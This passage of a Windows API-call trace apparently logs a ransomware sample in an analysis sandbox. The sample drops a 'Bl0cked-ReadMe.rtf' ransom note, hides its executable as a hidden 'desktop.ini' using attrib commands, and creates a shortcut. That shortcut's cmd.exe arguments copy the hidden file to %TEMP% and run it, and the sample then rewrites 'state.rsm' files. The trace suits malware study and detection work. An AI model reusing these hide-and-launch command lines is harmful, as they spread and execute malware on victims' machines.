lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0205.278] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\") returned 0x24 [0205.278] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0205.278] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0205.279] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf2c, dwThreadId=0x978)) returned 1 [0205.280] CloseHandle (hObject=0x1b4) returned 1 [0205.280] CloseHandle (hObject=0x120) returned 1 [0205.280] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\bl0cked-readme.rtf")) returned 0xffffffff [0205.280] GetLastError () returned 0x2 [0205.280] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0205.285] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\bl0cked-readme.rtf")) returned 0x20 [0205.285] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0205.285] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0205.286] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0205.286] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0205.286] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0205.286] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0205.286] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0205.286] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\") returned 0x24 [0205.286] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0205.286] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0205.286] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1") returned 0x23 [0205.287] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x14a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x14a [0205.287] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0205.287] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x4d4, dwThreadId=0xd68)) returned 1 [0205.292] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0206.668] CloseHandle (hObject=0x120) returned 1 [0206.668] CloseHandle (hObject=0x1b4) returned 1 [0206.668] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0206.668] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0206.668] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0206.668] GetTickCount () returned 0x3a2a4 [0206.668] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=26345742086) returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6b\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x49\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x52\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4b\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x64\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.669] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0206.669] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0206.669] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0206.669] CharUpperBuffW (in: lpsz="explorer.exe \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\" & type \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9d | out: lpsz="EXPLORER.EXE \"{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\" & TYPE \"{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9d [0206.669] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0206.669] CharUpperBuffW (in: lpsz="explorer.exe \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\" & type \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9e | out: lpsz="EXPLORER.EXE \"{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\" & TYPE \"{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9e [0206.669] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0206.669] CoInitialize (pvReserved=0x0) returned 0x0 [0206.669] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0206.671] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0206.671] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0206.671] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0206.673] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\" & type \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\desktop.ini\" > \"%TEMP%\\kLIRLKdN.exe\" && \"%TEMP%\\kLIRLKdN.exe\"") returned 0x0 [0206.673] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0206.673] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0206.674] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0206.674] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}.lnk", fRemember=0) returned 0x0 [0206.681] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0206.681] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0206.681] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0206.681] CoUninitialize () [0206.682] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0206.682] ReleaseMutex (hMutex=0xf8) returned 1 [0206.682] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0206.682] ReleaseMutex (hMutex=0xf8) returned 1 [0206.682] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0206.682] ReleaseMutex (hMutex=0xf8) returned 1 [0206.682] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0206.682] ReleaseMutex (hMutex=0xf8) returned 1 [0206.682] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=26347294333) returned 1 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2fa [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0206.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0206.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2fa [0206.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0206.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0206.686] ReadFile (in: hFile=0x120, lpBuffer=0x12e35c8, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12e35c8*, lpNumberOfBytesRead=0x12ec08*=0x17c, lpOverlapped=0x0) returned 1 [0206.709] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0206.709] WriteFile (in: hFile=0x120, lpBuffer=0x12e35c8*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12e35c8*, lpNumberOfBytesWritten=0x12ec1c*=0x17c, lpOverlapped=0x0) returned 1 [0206.709] SetFilePointer (in: hFile=0x120, lDistanceToMove=-380, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x17e [0206.709] ReadFile (in: hFile=0x120, lpBuffer=0x12e35c8, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12e35c8*, lpNumberOfBytesRead=0x12ec08*=0x17c, lpOverlapped=0x0) returned 1 [0206.709] SetFilePointer (in: hFile=0x120, lDistanceToMove=-380, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x17e [0206.709] WriteFile (in: hFile=0x120, lpBuffer=0x12e35c8*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12e35c8*, lpNumberOfBytesWritten=0x12ec1c*=0x17c, lpOverlapped=0x0) returned 1 [0206.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", 